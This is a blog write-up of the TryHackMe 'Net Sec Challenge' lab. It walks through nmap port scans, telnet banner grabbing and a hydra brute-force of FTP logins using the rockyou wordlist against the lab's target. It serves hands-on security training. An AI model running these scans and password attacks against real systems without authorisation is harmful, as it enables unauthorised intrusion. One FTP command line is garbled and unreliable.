Open in app

Sign in

Write

Sign in

TryHackMe: Net Sec Challenge

0xBA
2 min readDec 10, 2021

--

This is a write up for the THM Net Sec Challenge — https://tryhackme.com/room/netsecchallenge
We already have a number of write-ups but I thought I’d attempt to give a little more explanation on my approach, since there are many ways of skinning a cat.

What is the highest port number being open less than 10,000?

nmap nmap -sS -T4 -p1000-9999 TARGET

Since there was a hint for 4-digit port, best approach will be to limit the scans to run from 1000 (least possible) to 9999 (highest possible).
Then I use stealth-scan (-sS) which does not do the 3-way handshake hence faster.
The -T4 option is an aggressive approach of probing with very little pausing time.

There is an open port outside the common 1000 ports; it is above 10,000. What is it?

Same idea as the previous one:

The scan will take long, you don’t have to wait, as that runs, fire up a new terminal and move to the next one.

nmap -sS -T4 -p10000-65535 TARGET

How many TCP ports are open?

Another one that will take some time, run this as you head to the next one.

nmap -sS -T4 -p- TARGET

What is the flag hidden in the HTTP server header?

There are many ways you can tackle this, but the simplest way would be using telnet:

telnet IP 80
..
GET / HTTP/1.1

What is the flag hidden in the SSH server header?

Telnet will do the trick:

telnet IP 22

We have an FTP server listening on a nonstandard port. What is the version of the FTP server?

From your list of open ports, there’s one port that is nonstandard (unknown):

nmap -sS -sV -p<port> 10.10.222.215

We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?

Since we have the FTP port from the previous question, we can use this with hydra:

hydra -l <user-name> -P /usr/share/wordlists/rockyou.txt ftp://10.10.222.215:<port>

Now that we have the password, we can ftp into the server and catch the flag:

$ ftp
ftp> get <IP> <port>
ftp> ls
ftp> get <flag_file>

Browsing to http://IP:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?

nmap -sN -v TARGET
Tryhackme

--

--

0xBA

Written by 0xBA

0 Followers

//cybersec

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams